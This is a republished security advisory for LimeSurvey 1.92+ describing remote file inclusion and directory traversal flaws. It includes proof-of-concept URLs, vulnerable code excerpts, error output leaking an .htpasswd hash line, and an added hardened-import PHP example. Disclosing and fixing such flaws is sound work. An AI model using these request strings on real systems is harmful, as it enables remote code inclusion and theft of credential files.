Source: 自学PHP网 Date: 2015-04-17 14:11
Discovered by: dun \ posdub[at]gmail.com
[ LimeSurvey 1.92+ build 120620 ] Multiple Vulnerabilities

# Affected software: "LimeSurvey - the free and open source survey software tool"
Website: http://www.limesurvey.org/
Download: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip

# [RFI] ( allow_url_include = On; register_globals = On; )
Affected version: 1.92+ build 120620
Test: http://www.2cto.com/limesurvey/replacements.php?rootdir=http://localhost/phpinfo.txt?

File: ./limesurvey/replacements.php (line 3)
...cut...
    <?php
    global $rootdir;
    include_once($rootdir.'/classes/expressions/LimeExpressionManager.php'); // [RFI]
...cut...

# [Directory Traversal] ( display_errors = On; register_globals = On; )
Affected versions: 1.92+ build 120620 and previous
Test: http://www.2cto.com/limesurvey/admin/importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=../../secret/.htpasswd

File: ./limesurvey/admin/importsurvey.php (lines 18-38)
...cut...
    if ((!isset($importingfrom) && !isset($copyfunction)) || isset($_REQUEST['importingfrom'])) // 1 false if $copyfunction is set
    {
        die("Cannot run this script directly");
    }
    require_once('import_functions.php'); // 2 include functions
    if (!isset($copyfunction))
    {
        $sFullFilepath=$the_full_file_path;
        $aPathInfo = pathinfo($sFullFilepath);
        $sExtension = $aPathInfo['extension'];
    }
    $bImportFailed=false;
    if (isset($sExtension) && strtolower($sExtension)=='csv')
    {
        $aImportResults=CSVImportSurvey($sFullFilepath);
    }
    elseif (isset($sExtension) && strtolower($sExtension)=='lss') // 3 true if $sExtension = 'lss'
    {
        $aImportResults=XMLImportSurvey($sFullFilepath,null,null, null,(isset($_POST['translinksfields']))); // 4 $sFullFilepath -> our file
...cut...

File: ./limesurvey/admin/import_functions.php (lines 1080-1087)
...cut...
    function XMLImportSurvey($sFullFilepath,$sXMLdata=NULL,$sNewSurveyName=NULL,$iDesiredSurveyId=NULL, $bTranslateInsertansTags=true)
    {
        global $connect, $dbprefix, $clang, $timeadjust;
        $results['error']=false;
        if ($sXMLdata == NULL)
        {
            $xml = simplexml_load_file($sFullFilepath); // 5 try to open our file as xmlfile
...cut...

This should return a warning with the first line of our file.
In this case: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ from .htpasswd :)

Something like this:

    Warning: simplexml_load_file() [function.simplexml-load-file]: ../../secret/.htpasswd:1:parser error : Start tag expected, '<' not found in /www/limesurvey/admin/import_functions.php on line 1087
    Warning: simplexml_load_file() [function.simplexml-load-file]: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ in /www/limesurvey/admin/import_functions.php on line 1087
    Warning: simplexml_load_file() [function.simplexml-load-file]: ^ in /www/limesurvey/admin/import_functions.php on line 1087
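
For comparison with the directory traversal described above, a hardened import path as an added example (not part of the original advisory and not LimeSurvey's own code or fix). UPLOAD_DIR, safe_import_path() and load_survey_xml() are hypothetical names, and the upload directory is an assumed location.

```php
<?php
// Added example, not LimeSurvey code. UPLOAD_DIR, safe_import_path() and
// load_survey_xml() are hypothetical names chosen for illustration.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/limesurvey/upload'; // assumed directory of permitted import files

/**
 * Resolve a caller-supplied path and return it only if it is a regular
 * .lss/.csv file located inside $baseDir; return null otherwise.
 */
function safe_import_path(string $candidate, string $baseDir = UPLOAD_DIR): ?string
{
    $base = realpath($baseDir);
    $real = realpath($candidate); // collapses ../ and symlinks; false if the file is missing
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Compare against the base plus a trailing separator so /upload-x cannot match /upload.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Take the extension from the resolved file, never from a separate request variable.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ['lss', 'csv'], true) ? $real : null;
}

/**
 * Parse an import file without letting libxml warnings, which quote the
 * offending line of the file, reach the HTTP response.
 */
function load_survey_xml(string $path): ?SimpleXMLElement
{
    $previous = libxml_use_internal_errors(true); // collect errors instead of emitting warnings
    $xml = simplexml_load_file($path, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $xml === false ? null : $xml;
}

// Constructed usage: the path from the advisory is rejected before any parsing happens.
$requested = $argv[1] ?? '../../secret/.htpasswd';
$path = safe_import_path($requested);
if ($path === null) {
    fwrite(STDERR, "import rejected\n");
    exit(1);
}
echo load_survey_xml($path) === null ? "not a valid survey file\n" : "survey file parsed\n";
```

Both issues also depend on register_globals = On, so every variable the scripts read should be initialised explicitly instead of being taken from request globals.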